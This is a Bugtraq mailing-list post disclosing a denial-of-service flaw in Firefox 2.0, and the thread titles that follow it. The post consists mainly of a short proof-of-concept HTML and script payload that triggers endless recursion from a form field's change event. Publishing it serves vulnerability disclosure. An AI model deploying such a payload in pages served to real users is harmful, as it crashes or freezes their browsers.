Bugtraq mailing list archives
Mozilla Firefox 2.0 denial of service vulnerability
From: sapheal () hack pl
Date: Mon, 1 Jan 2007 20:43:34 +0100
PoC exploit:
<script>
function owned(){
setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">
It is available under the following address:
http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html
Kind regards,
Michal Bucko (sapheal)
HACK.PL
Current thread:
- Mozilla Firefox 2.0 denial of service vulnerability sapheal (Jan 01)
- Re: Mozilla Firefox 2.0 denial of service vulnerability Jeroen Massar (Jan 01)
- <Possible follow-ups>
- Re: Re: Mozilla Firefox 2.0 denial of service vulnerability sapheal (Jan 01)
